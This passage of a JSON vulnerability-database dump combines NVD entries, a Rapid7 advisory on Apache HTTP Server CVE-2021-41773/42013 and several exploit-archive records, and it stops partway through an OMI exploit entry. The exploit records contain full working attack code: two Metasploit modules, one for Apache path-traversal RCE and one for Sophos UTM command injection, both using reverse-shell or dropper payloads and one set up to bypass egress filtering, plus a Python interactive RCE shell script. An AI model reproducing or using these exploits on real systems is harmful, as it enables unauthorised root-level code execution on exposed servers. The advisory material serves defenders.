"bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31806"], "modified": "2021-09-14T17:37:00", "cpe": ["cpe:/o:debian:debian_linux:9.0", "cpe:/o:fedoraproject:fedora:34", "cpe:/a:netapp:cloud_manager:-", "cpe:/o:fedoraproject:fedora:33", "cpe:/o:debian:debian_linux:10.0"], "id": "CVE-2021-31806", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31806", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_manager:-:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:28:44", "description": "Open Management Infrastructure Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-38647", "cwe": ["CWE-665"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:microsoft:azure_open_management_infrastructure:-", "cpe:/a:microsoft:log_analytics_agent:-", "cpe:/a:microsoft:container_monitoring_solution:-", "cpe:/a:microsoft:azure_stack_hub:-", "cpe:/a:microsoft:azure_automation_state_configuration:-", "cpe:/a:microsoft:azure_diagnostics_\\(lad\\):-", "cpe:/a:microsoft:azure_sentinel:-", "cpe:/a:microsoft:azure_security_center:-", "cpe:/a:microsoft:system_center_operations_manager:-", "cpe:/a:microsoft:azure_automation_update_management:-"], "id": "CVE-2021-38647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:azure_sentinel:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_automation_update_management:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_security_center:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:system_center_operations_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_diagnostics_\\(lad\\):-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:log_analytics_agent:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_open_management_infrastructure:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:container_monitoring_solution:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:azure_stack_hub:-:*:*:*:*:*:*:*"]}], "rapid7blog": [{"lastseen": "2021-10-16T08:58:36", "description": "CVE | Vendor Advisory | AttackerKB | IVM Content | Patching Urgency | Last Update \n---|---|---|---|---|--- \nCVE-2021-41773, CVE-2021-42013 | [Apache Advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) | [AttackerKB](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) | Available | ASAP | October 12, 2021 15:00 ET \n \n\n\n_See the `Updates` section at the end of this post for information on developments that occurred after initial publication._\n\nOn Monday, October 4, 2021, Apache published [an advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>) on [CVE-2021-41773](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>), an unauthenticated remote file disclosure vulnerability in HTTP Server version 2.4.49 and 2.4.50 (see the `Updates` section for more on 2.4.50). The vulnerability arises from the mishandling of URL-encoded path traversal characters in the HTTP GET request. Public proof-of-concept exploit code is widely available, and Apache and others have noted that this vulnerability is being exploited in the wild. Note that a non-default configuration is required for exploitability.\n\nWhile the original advisory indicated that CVE-2021-41773 was merely an information disclosure bug, both [Rapid7](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) and [community](<https://twitter.com/hackerfantastic/status/1445529822071967745>) researchers have verified that the vulnerability can be used for remote code execution **when [mod_cgi](<https://httpd.apache.org/docs/current/mod/mod_cgi.html>) is enabled.** While mod_cgi is not enabled in the default Apache Server HTTP configuration, it\u2019s also not an uncommon feature to enable. With mod_cgi enabled, an attacker can execute arbitrary programs via HTTP POST requests. The initial RCE proof of concept resulted in blind command execution, and there have been multiple proofs of concept that coerce the HTTP server into sending the program\u2019s output back to the attacker. Rapid7\u2019s research team has a [full root cause analysis of CVE-2021-41773 here](<https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>) along with proofs of concept.\n\nRapid7 Labs has identified roughly 65,000 potentially vulnerable versions of Apache httpd exposed to the public internet. Our exposure estimate intentionally does not count multiple Apache servers on the same IP as different instances (this would substantially increase the number of exposed instances identified as vulnerable).\n\n\n\n## Mitigation guidance\n\nOrganizations that are using Apache HTTP Server 2.4.49 or 2.4.50 should determine whether they are using vulnerable configurations. If a vulnerable server is discovered, the server\u2019s configuration file should be updated to include the filesystem directory directive with _require all denied_:\n \n \n <Directory />\n Require all denied\n </Directory>\n \n\nApache HTTP Server users should update to **2.4.51** or later as soon as is practical. Updating to HTTP Server 2.4.51 remediates both CVE-2021-41773 and CVE-2021-42013. For more information, see [Apache\u2019s advisory here](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\n## Rapid7 customers\n\nA remote vulnerability check for CVE-2021-41773 was released to InsightVM and Nexpose customers in the October 6, 2021 content update.\n\nA remote vulnerability check for CVE-2021-42013 was released to InsightVM and Nexpose customers in the October 7, 2021 content update.\n\n## Updates\n\n**October 7, 2021:** Apache has updated their advisory to note that the patch for CVE-2021-41773 was incomplete, rendering HTTP Server 2.4.50 versions vulnerable when specific, non-default conditions are met. According to their advisory, "an attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration _require all denied_, these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution."\n\nCVE-2021-42013 has been assigned to track the incomplete fix for CVE-2021-41773. CVE-2021-42013 has been fixed in HTTP Server version 2.4.51 released October 7, 2021. For more information, [see Apache's advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-10-06T16:42:32", "type": "rapid7blog", "title": "Apache HTTP Server CVE-2021-41773 Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-06T16:42:32", "id": "RAPID7BLOG:9C7E6BE350F06790928CFF68E04A6ECE", "href": "https://blog.rapid7.com/2021/10/06/apache-http-server-cve-2021-41773-exploited-in-the-wild/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2021-12-23T13:19:11", "description": "This Metasploit module exploits an unauthenticated remote code execution vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled, it can be used to execute arbitrary commands. This vulnerability has been reintroduced in the Apache 2.4.50 fix (CVE-2021-42013).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-26T00:00:00", "type": "zdt", "title": "Apache 2.4.49 / 2.4.50 Traversal / Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2021-10-26T00:00:00", "id": "1337DAY-ID-36952", "href": "https://0day.today/exploit/description/36952", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::CheckModule\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE',\n 'Description' => %q{\n This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).\n If files outside of the document root are not protected by \u2018require all denied\u2019 and CGI has been explicitly enabled,\n it can be used to execute arbitrary commands (Remote Command Execution).\n This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).\n },\n 'References' => [\n ['CVE', '2021-41773'],\n ['CVE', '2021-42013'],\n ['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],\n ['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],\n ['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],\n ['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']\n ],\n 'Author' => [\n 'Ash Daulton', # Vulnerability discovery\n 'Dhiraj Mishra', # Metasploit auxiliary module\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Metasploit exploit module (Zeop Entreprise)\n ],\n 'DisclosureDate' => '2021-05-10',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'DefaultOptions' => {\n 'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path',\n 'Action' => 'CHECK_RCE',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Targets' => [\n [\n 'Automatic (Dropper)',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => 'false'\n }\n }\n ],\n [\n 'Unix Command (In-Memory)',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => 'true'\n }\n }\n ],\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),\n OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),\n OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])\n ])\n end\n\n def cmd_unix_generic?\n datastore['PAYLOAD'] == 'cmd/unix/generic'\n end\n\n def execute_command(command, _opts = {})\n traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'\n\n uri = normalize_uri(datastore['TARGETURI'], traversal.to_s)\n response = send_request_raw({\n 'method' => Rex::Text.rand_text_alpha(3..4),\n 'uri' => uri,\n 'data' => \"#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}\"\n })\n if response && response.body\n return response.body\n end\n\n false\n end\n\n def message(msg)\n \"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}\"\n end\n\n def pick_payload\n case datastore['CVE']\n when 'CVE-2021-41773'\n payload = '.%2e/'\n when 'CVE-2021-42013'\n payload = '.%%32%65/'\n else\n payload = ''\n end\n\n payload\n end\n\n def exploit\n @proto = (ssl ? 'https' : 'http')\n\n if (!check.eql? Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'The target is not exploitable.')\n end\n\n print_status(message(\"Attempt to exploit for #{datastore['CVE']}\"))\n case target['Type']\n when :linux_dropper\n\n file_name = \"/tmp/#{Rex::Text.rand_text_alpha(4..8)}\"\n cmd = \"echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}\"\n\n print_status(message(\"Sending #{datastore['PAYLOAD']} command payload\"))\n vprint_status(message(\"Generated command payload: #{cmd}\"))\n\n execute_command(cmd)\n\n register_file_for_cleanup file_name\n when :unix_command\n vprint_status(message(\"Generated payload: #{payload.encoded}\"))\n\n if !cmd_unix_generic?\n execute_command(payload.encoded)\n else\n received = execute_command(payload.encoded.to_s)\n\n print_warning(message('Dumping command output in response'))\n if !received\n print_error(message('Empty response, no command output'))\n\n return\n end\n print_line(received)\n end\n end\n end\nend\n", "sourceHref": "https://0day.today/exploit/36952", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-03T01:49:07", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "zdt", "title": "Apache HTTP Server 2.4.50 - Remote Code Execution Exploit (3)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013", "CVE-2021-41773"], "modified": "2021-11-11T00:00:00", "id": "1337DAY-ID-37030", "href": "https://0day.today/exploit/description/37030", "sourceData": "# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)\n# Exploit Author: Valentin Lobstein\n# Vendor Homepage: https://apache.org/\n# Software Link: https://github.com/Balgogan/CVE-2021-41773\n# Version: Apache 2.4.49/2.4.50 (CGI enabled)\n# Tested on: Debian GNU/Linux\n# CVE : CVE-2021-41773 / CVE-2021-42013\n# Credits : Lucas Schnell\n\n\n#!/usr/bin/env python3\n#coding: utf-8\n\nimport os\nimport re\nimport sys\nimport time\nimport requests\nfrom colorama import Fore,Style\n\n\nheader = '''\\033[1;91m\n \n \u2584\u2584\u2584 \u2588\u2588\u2593\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2591 \u2588\u2588 \u2593\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2580\u2588\u2588\u2588 \u2584\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2588\u2588\u2588 \n \u2592\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2592\u2588\u2588\u2588\u2588\u2584 \u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2593\u2588 \u2580 \u2593\u2588\u2588 \u2592 \u2588\u2588\u2592\u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588 \u2580 \n \u2592\u2588\u2588 \u2580\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2592\u2588\u2588 \u2580\u2588\u2584 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2588\u2591\u2592\u2588\u2588\u2588 \u2593\u2588\u2588 \u2591\u2584\u2588 \u2592\u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2588 \n \u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2591\u2593\u2588 \u2591\u2588\u2588 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2584 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2592\u2593\u2588 \u2584 \n \u2593\u2588 \u2593\u2588\u2588\u2592\u2592\u2588\u2588\u2592 \u2591 \u2591 \u2593\u2588 \u2593\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2593\u2588\u2592\u2591\u2588\u2588\u2593\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \u2591\u2588\u2588\u2593 \u2592\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2592\u2588\u2588\u2588\u2588\u2592\n \u2592\u2592 \u2593\u2592\u2588\u2591\u2592\u2593\u2592\u2591 \u2591 \u2591 \u2592\u2592 \u2593\u2592\u2588\u2591\u2591 \u2591\u2592 \u2592 \u2591 \u2592 \u2591\u2591\u2592\u2591\u2592\u2591\u2591 \u2592\u2591 \u2591 \u2591 \u2592\u2593 \u2591\u2592\u2593\u2591\u2591 \u2591\u2592 \u2592 \u2591\u2591\u2591 \u2592\u2591 \u2591\n \u2592 \u2592\u2592 \u2591\u2591\u2592 \u2591 \u2592 \u2592\u2592 \u2591 \u2591 \u2592 \u2592 \u2591\u2592\u2591 \u2591 \u2591 \u2591 \u2591 \u2591\u2592 \u2591 \u2592\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\n \u2591 \u2592 \u2591\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591 \n''' + Style.RESET_ALL\n\n\nif len(sys.argv) < 2 :\n print( 'Use: python3 file.py ip:port ' )\n sys.exit()\n\ndef end():\n print(\"\\t\\033[1;91m[!] Bye bye !\")\n time.sleep(0.5)\n sys.exit(1)\n\ndef commands(url,command,session):\n directory = mute_command(url,'pwd')\n user = mute_command(url,'whoami')\n hostname = mute_command(url,'hostname')\n advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\\'t an interactive shell)')\n command = input(f\"{Fore.RED}\u256d\u2500{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\\n{Fore.RED}\u2570\u2500{Fore.YELLOW}$ {Style.RESET_ALL}\") \n command = f\"echo; {command};\"\n req = requests.Request('POST', url=url, data=command)\n prepare = req.prepare()\n prepare.url = url \n response = session.send(prepare, timeout=5)\n output = response.text\n print(output)\n if 'clear' in command:\n os.system('/usr/bin/clear')\n print(header)\n if 'exit' in command:\n end()\n\ndef mute_command(url,command):\n session = requests.Session()\n req = requests.Request('POST', url=url, data=f\"echo; {command}\")\n prepare = req.prepare()\n prepare.url = url \n response = session.send(prepare, timeout=5)\n return response.text.strip()\n\n\ndef exploitRCE(payload):\n s = requests.Session()\n try:\n host = sys.argv[1]\n if 'http' not in host:\n url = 'http://'+ host + payload\n else:\n url = host + payload \n session = requests.Session()\n command = \"echo; id\"\n req = requests.Request('POST', url=url, data=command)\n prepare = req.prepare()\n prepare.url = url \n response = session.send(prepare, timeout=5)\n output = response.text\n if \"uid\" in output:\n choice = \"Y\"\n print( Fore.GREEN + '\\n[!] Target %s is vulnerable !!!' % host)\n print(\"[!] Sortie:\\n\\n\" + Fore.YELLOW + output )\n choice = input(Fore.CYAN + \"[?] Do you want to exploit this RCE ? (Y/n) : \")\n if choice.lower() in ['','y','yes']:\n while True:\n commands(url,command,session) \n else:\n end() \n else :\n print(Fore.RED + '\\nTarget %s isn\\'t vulnerable' % host)\n except KeyboardInterrupt:\n end()\n\ndef main():\n try:\n apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'\n apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'\n payloads = [apache2449_payload,apache2450_payload]\n choice = len(payloads) + 1\n print(header)\n print(\"\\033[1;37m[0] Apache 2.4.49 RCE\\n[1] Apache 2.4.50 RCE\")\n while choice >= len(payloads) and choice >= 0:\n choice = int(input('[~] Choice : '))\n if choice < len(payloads):\n exploitRCE(payloads[choice])\n except KeyboardInterrupt:\n print(\"\\n\\033[1;91m[!] Bye bye !\")\n time.sleep(0.5)\n sys.exit(1)\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/37030", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-25T17:20:35", "description": "This Metasploit module exploits an SID-based command injection in Sophos UTM's WebAdmin interface to execute shell commands as the root user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-31T00:00:00", "type": "zdt", "title": "Sophos UTM WebAdmin SID Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2021-10-31T00:00:00", "id": "1337DAY-ID-36966", "href": "https://0day.today/exploit/description/36966", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Sophos UTM WebAdmin SID Command Injection',\n 'Description' => %q{\n This module exploits an SID-based command injection in Sophos UTM's\n WebAdmin interface to execute shell commands as the root user.\n },\n 'Author' => [\n # Discovered by unknown researcher(s)\n 'Justin Kennedy', # Analysis and PoC\n 'wvu' # Supplementary analysis and exploit\n ],\n 'References' => [\n ['CVE', '2020-25223'],\n ['URL', 'https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce'],\n ['URL', 'https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223'],\n ['URL', 'https://attackerkb.com/assessments/d6e0dff3-dd46-4f19-831d-c3f3f2fa972a']\n ],\n 'DisclosureDate' => '2020-09-18',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 4444,\n 'LPORT' => 443, # XXX: Bypass Sophos UTM's egress filtering\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [FIRST_ATTEMPT_FAIL],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def stopwatch\n # https://blog.dnsimple.com/2018/03/elapsed-time-with-ruby-the-right-way/\n start = Process.clock_gettime(Process::CLOCK_MONOTONIC)\n ret = yield\n elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - start\n\n [ret, elapsed]\n end\n\n def check\n sleep_time = rand(5..10)\n\n injected, elapsed_time = stopwatch do\n inject_cmd(\"sleep #{sleep_time}\", timeout: sleep_time * 1.5)\n end\n\n return CheckCode::Unknown if injected.nil?\n\n vprint_status(\"Elapsed time: #{elapsed_time} seconds\")\n\n # injected == false\n unless injected && elapsed_time > sleep_time\n return CheckCode::Safe('Failed to test command injection.')\n end\n\n # injected == true\n CheckCode::Appears('Successfully tested command injection.')\n end\n\n def exploit\n unless datastore['LPORT'] == 443\n print_warning('LPORT=443 is recommended to bypass egress filtering')\n end\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n # nil or true on success\n if inject_cmd(cmd) == false\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n end\n\n def inject_cmd(cmd, timeout: 3.5)\n vprint_status(\"Injecting command: #{cmd}\")\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'var'),\n 'ctype' => 'application/json; charset=UTF-8', # NOTE: charset is required\n 'data' => {\n 'SID' => \"|#{cmd}|\" # https://perldoc.perl.org/functions/open#Opening-a-filehandle-into-a-command\n }.to_json\n }, timeout)\n\n return unless res\n return false unless res.code == 200 && res.body.include?(alert_msg)\n\n true\n end\n\n def alert_msg\n # {\"RID\":\"\",\"objs\":[{\"js\":\"json_abort(true);\"},{\"alert\":\"Backend connection failed, please click Shift-Reload to try again.\"}]}\n 'Backend connection failed, please click Shift-Reload to try again.'\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36966", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-21T13:34:04", "description": "By removing the authentication header, an attacker can issue an HTTP request to the OMI management endpoint that will cause it to execute an operating system command as the root user. This vulnerability was patched in OMI version 1.6.8-1 (released September 8th 2021).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 